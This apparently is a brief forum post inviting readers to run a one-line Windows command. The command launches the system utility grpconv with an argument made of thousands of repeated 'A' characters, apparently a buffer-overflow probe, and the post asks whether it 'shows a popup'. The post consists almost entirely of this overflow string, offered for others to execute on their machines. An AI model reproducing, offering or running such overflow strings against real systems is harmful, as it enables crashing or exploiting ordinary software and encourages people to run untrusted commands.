Anybody wanna try if this shows a popup? It's 1 line, if it wraps put it back together:

-------------------------------
set !!!!!!=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 && %SystemRoot%\system32\grpconv AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA